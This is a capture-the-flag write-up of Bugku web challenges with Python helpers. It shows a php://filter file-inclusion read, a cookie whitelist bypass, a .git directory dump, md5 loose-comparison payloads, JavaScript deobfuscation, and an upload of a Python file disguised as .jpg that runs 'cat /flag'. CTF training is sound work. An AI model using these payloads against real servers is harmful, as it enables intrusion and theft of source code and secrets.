web0

BP-basic

Bugku - Seems to need a password

A Python script plus a Burp Suite (Intruder) brute force is enough.

PHP code audit

Bugku - File inclusion

After clicking through, the URL shows a file being loaded through a parameter, so there may be a file inclusion vulnerability.

http://114.67.246.176:11573/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
// The flag is in a comment in index.php; php://filter hands the source back base64-encoded (instead of executing it), so decode it to read the comment
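As an added example (not part of the original writeup), the php://filter read above carried out as a small helper: it builds the wrapper URL, pulls the base64 blob out of whatever HTML the response wraps it in, and lists the PHP comments, which is where this challenge hides the flag. The target URL is the one from the writeup and is only used to build a string; the response body and the index.php contents are constructed sample data, and the flag in it is made up.

```python
import base64
import re
from urllib.parse import urlencode

# Target from the writeup, only used to build the request string (no request is sent here).
BASE = "http://114.67.246.176:11573/index.php"


def filter_read_url(base, param, resource):
    """Build a php://filter read URL: the server base64-encodes `resource`
    instead of executing it, so PHP source can be read back."""
    wrapper = "php://filter/read=convert.base64-encode/resource=" + resource
    return base + "?" + urlencode({param: wrapper}, safe="/:=")


def decode_filter_body(body):
    """Pull the base64 blob out of the response (it may be wrapped in HTML)
    and decode it back to the original PHP source."""
    m = re.search(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if not m:
        raise ValueError("no base64 blob in response body")
    return base64.b64decode(m.group(0)).decode("utf-8", "replace")


def php_comments(src):
    """Return the text of //, # and /* ... */ comments in PHP source.
    Heuristic: a '//' inside a string literal (e.g. a URL) is matched too."""
    out = []
    for m in re.finditer(r"/\*(.*?)\*/|(?://|#)([^\n]*)", src, re.S):
        body = m.group(1) if m.group(1) is not None else m.group(2)
        out.append(body.strip())
    return out


def flags_in_comments(src, pattern=r"flag\{[^}]*\}"):
    """Flag-looking tokens found inside comments only."""
    return [t for c in php_comments(src) for t in re.findall(pattern, c)]


# Constructed sample: a made-up index.php and the base64 response php://filter would give for it.
SAMPLE_SOURCE = "<?php\n/* nothing here */\n// flag{constructed_example_flag}\necho 'hello';\n"
SAMPLE_BODY = "<html><body>" + base64.b64encode(SAMPLE_SOURCE.encode()).decode() + "</body></html>"

if __name__ == "__main__":
    print(filter_read_url(BASE, "file", "index.php"))
    print(flags_in_comments(decode_filter_body(SAMPLE_BODY)))
```

The base64 regex deliberately ignores short alphanumeric runs such as HTML tag names, so the decoder also works when the challenge page prints the blob inside its template rather than bare.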

Bugku - cookies

Looking at the URL, the filename parameter is base64-encoded; it decodes to keys.txt.

Try base64-encoding index.php and reading index.php the same way.

import base64
import requests

url = "http://114.67.246.176:14608"
# the server base64-decodes filename; send it as str, not bytes
fn = base64.b64encode(b"index.php").decode()
para = {"line": "", "filename": fn}
output = ""
# index.php comes back one line per request via the line parameter; 100 is a generous upper bound
for i in range(100):
    para["line"] = str(i)
    output += requests.get(url, params=para).text
print(output)

This returns the source of index.php:
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);

// keys.php only joins the whitelist when the cookie margin=margin is present
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}

// whitelisted file is read with file() and a single line of it is echoed
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

Reading the code: filename must decode to keys.php, which is only whitelisted when the cookie margin=margin is set, so send that cookie along with filename=a2V5cy5waHA= (base64 of keys.php) to get the key printed.

GET /index.php?line=&filename=a2V5cy5waHA= HTTP/1.1
Host: 114.67.246.176:14608
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: margin=margin
Connection: close

git

Bugku-source

dirsearch finds an exposed .git directory

Download all of it (wget -r only works when directory listing is enabled on /.git/):

wget -r http://114.67.246.176:13725/.git/
sheren@ubuntu:~/114.67.246.176:13725$ git reflog
d256328 (HEAD -> master) HEAD@{0}: reset: moving to d25632
13ce8d0 HEAD@{1}: commit: flag is here?
fdce35e HEAD@{2}: reset: moving to fdce35e
e0b8e8e HEAD@{3}: reset: moving to e0b8e
40c6d51 HEAD@{4}: commit: flag is here?
fdce35e HEAD@{5}: commit: flag is here?
d256328 (HEAD -> master) HEAD@{6}: commit: flag is here?
e0b8e8e HEAD@{7}: commit (initial): this is index.html

Then git show each commit in turn. The reflog is what matters here: the commits the resets moved HEAD away from are no longer reachable from master, so plain git log would not list them.

sheren@ubuntu:~/114.67.246.176:13725$ git show 40c6d51
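As an added example (not part of the original writeup), the same enumeration done offline against the raw reflog file, .git/logs/HEAD, which is the file wget fetched and which git reflog is formatted from. It lists every commit id HEAD ever pointed at, newest first, and separately the commits a reset abandoned, which are the first ones worth a git show. The reflog content below is constructed to mirror the writeup's output; the 40-character ids are the abbreviated hashes padded with zeros and the committer name and timestamps are made up.

```python
import re
from collections import namedtuple

# One .git/logs/HEAD line: "<old-sha> <new-sha> <committer> <timestamp> <tz>\t<message>"
REFLOG_LINE = re.compile(
    r"^([0-9a-f]{40}) ([0-9a-f]{40}) .*? (\d+) ([+-]\d{4})\t(.*)$"
)
Entry = namedtuple("Entry", "old new message")


def parse_reflog(text):
    """Parse the raw reflog file (oldest entry first, as git stores it)."""
    entries = []
    for line in text.splitlines():
        m = REFLOG_LINE.match(line)
        if m:
            entries.append(Entry(m.group(1), m.group(2), m.group(5)))
    return entries


def reflog_commits(text):
    """Every commit id HEAD ever pointed at, newest first (the order `git reflog`
    prints), deduplicated. Includes commits a reset left unreachable, which
    `git log` alone would not show."""
    seen, out = set(), []
    for e in reversed(parse_reflog(text)):
        if e.new not in seen:
            seen.add(e.new)
            out.append(e.new)
    return out


def abandoned_by_reset(text):
    """Commits HEAD was moved *away from* by a reset, newest first: the first
    candidates to `git show` when looking for a deleted flag."""
    seen, out = set(), []
    for e in reversed(parse_reflog(text)):
        if e.message.startswith("reset:") and e.old not in seen:
            seen.add(e.old)
            out.append(e.old)
    return out


def _sha(prefix):
    # Constructed 40-hex ids built from the abbreviated hashes in the writeup.
    return prefix + "0" * (40 - len(prefix))


def _line(old, new, msg, ts):
    # Constructed committer identity and timestamps.
    return f"{old} {new} sheren <sheren@ubuntu> {ts} +0800\t{msg}"


# Constructed logs/HEAD mirroring the challenge's `git reflog` output, oldest first.
SAMPLE_REFLOG = "\n".join([
    _line("0" * 40,        _sha("e0b8e8e"), "commit (initial): this is index.html", 1600000000),
    _line(_sha("e0b8e8e"), _sha("d256328"), "commit: flag is here?", 1600000001),
    _line(_sha("d256328"), _sha("fdce35e"), "commit: flag is here?", 1600000002),
    _line(_sha("fdce35e"), _sha("40c6d51"), "commit: flag is here?", 1600000003),
    _line(_sha("40c6d51"), _sha("e0b8e8e"), "reset: moving to e0b8e", 1600000004),
    _line(_sha("e0b8e8e"), _sha("fdce35e"), "reset: moving to fdce35e", 1600000005),
    _line(_sha("fdce35e"), _sha("13ce8d0"), "commit: flag is here?", 1600000006),
    _line(_sha("13ce8d0"), _sha("d256328"), "reset: moving to d25632", 1600000007),
]) + "\n"

if __name__ == "__main__":
    for sha in reflog_commits(SAMPLE_REFLOG):
        print("git show", sha[:7])
```

Note that the reflog only records where HEAD pointed; objects that were never a HEAD target (for example dangling blobs) need git fsck --lost-found, which this helper does not cover.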

Bugku - Backups are a good habit

dirsearch finds /index.php.bak

<?php
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?'); // everything from the '?' onwards
$str = substr($str,1); // drop the '?'
$str = str_replace('key','',$str); // remove 'key' (a single pass, so 'kkeyey' survives as 'key')
parse_str($str); // parse the query string into variables, i.e. set $key1 and $key2
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){ // '==' is loose: md5() of an array is NULL, or use two strings whose md5 both start with 0e
echo $flag."取得flag";
}
?>

// http://114.67.246.176:11868/?kkeyey1[]=[1]&kkeyey2[]=[2]   arrays: md5() returns NULL for both, and NULL == NULL
// http://114.67.246.176:11868/?kkeyey1=QNKCDZO&kkeyey2=240610708   "collision": both md5 values start with 0e and compare equal as numbers
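As an added example (not part of the original writeup), the three weaknesses of this check emulated in Python so the two payloads above can be reasoned about offline: the single-pass str_replace filter, PHP's loose == on numeric-looking strings, and md5() returning NULL for an array. The emulation of PHP semantics here is my own approximation, limited to what the check needs, and the queries are the ones from the writeup.

```python
import hashlib
import re
from urllib.parse import parse_qsl

# PHP's idea of a numeric string: optional sign, digits, optional exponent (so "0e123" qualifies)
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
MAGIC = re.compile(r"^0e\d+$")


def strip_key_once(query):
    """str_replace('key', '', $str) is a single pass: 'kkeyey' -> 'key'."""
    return query.replace("key", "")


def php_parse_str(query):
    """Minimal parse_str(): 'name[]=v' builds an array, anything else a string."""
    params = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.endswith("[]"):
            params.setdefault(name[:-2], []).append(value)
        else:
            params[name] = value
    return params


def php_md5(value):
    """md5() as PHP 5/7 behave: an array gives NULL (with a warning), NULL is ''.
    PHP 8 raises a TypeError for arrays, which closes the array trick."""
    if isinstance(value, list):
        return None
    if value is None:
        value = ""
    return hashlib.md5(value.encode()).hexdigest()


def php_loose_eq(a, b):
    """'==' on two strings: if both are numeric (including 0e... forms) compare as floats."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(s):
    """True when md5(s) is '0e' followed only by digits, i.e. numerically zero."""
    return MAGIC.match(hashlib.md5(s.encode()).hexdigest()) is not None


def check_passes(query):
    """Emulate the backup's check: md5($key1) == md5($key2) && $key1 !== $key2."""
    p = php_parse_str(strip_key_once(query))
    k1, k2 = p.get("key1"), p.get("key2")
    h1, h2 = php_md5(k1), php_md5(k2)
    if h1 is None or h2 is None:
        equal = h1 is None and h2 is None   # NULL == NULL is true; NULL == 'hash' is not
    else:
        equal = php_loose_eq(h1, h2)
    return equal and k1 != k2


if __name__ == "__main__":
    for q in ("kkeyey1[]=[1]&kkeyey2[]=[2]",
              "kkeyey1=QNKCDZO&kkeyey2=240610708",
              "key1=QNKCDZO&key2=240610708"):
        print(q, "->", check_passes(q))
```

The third query shows why the doubled-up kkeyey spelling is needed: a plain key1 has its 'key' stripped and never reaches parse_str, so $key1 and $key2 are both unset and the strict !== fails.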

JavaScript

Bugku - Source code

<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>

unescape is the JS percent-decoding function. Rather than letting eval run the decoded string, write it out with document.write to see the source.

Decoding script:
<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
document.write(unescape(p1));
document.write(unescape('%35%34%61%61%32' + p2));
</script>
// Decoded source
function checkSubmit(){
var a=document.getElementById("password");
// the password field is compared against a fixed string: submit 67d709b2b54aa2aa648cf6e87a7114f1 to pass
if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)
return!0;
alert("Error");
a.focus();
return!1}}
document.getElementById("levelQuest").onsubmit=checkSubmit;
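As an added example (not part of the original writeup), the same deobfuscation done without a browser and without ever executing the decoded code: the three fragments are exactly the ones from the challenge, JS unescape on %XX sequences is plain percent-decoding (urllib's unquote does the same; the %uXXXX form unescape also accepts does not occur here), and the expected password is pulled out with a regex on the recovered source.

```python
import re
from urllib.parse import unquote

# The percent-encoded fragments exactly as the challenge page embeds them.
P1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62'
P2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b'
GLUE = '%35%34%61%61%32'   # the literal the page splices between p1 and p2


def deobfuscate(p1=P1, p2=P2, glue=GLUE):
    """Reproduce eval(unescape(p1) + unescape(glue + p2)) without eval:
    unescape on %XX input is plain percent-decoding, which unquote handles."""
    return unquote(p1) + unquote(glue + p2)


def expected_password(src):
    """Pull out the literal the decoded checkSubmit compares the password field against."""
    m = re.search(r'if\("([0-9a-f]{32})"==a\.value\)', src)
    return m.group(1) if m else None


if __name__ == "__main__":
    src = deobfuscate()
    print(src)
    print("password:", expected_password(src))
```

Decoding offline like this also shows why the fragment splitting exists: the 32-character value is spread over three strings so that no single literal in the page contains the password.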

Python

Bugku-Flask_FileUpload

Looking at the page source, it is enough to rename the .py payload to .jpg and upload it; the flag can then be read in the developer tools (F12).

import os

# payload uploaded as .jpg: print the flag, then dump the app's own source for good measure
os.system('cat /flag')

with open("app.py", "r") as f:
    print(f.read())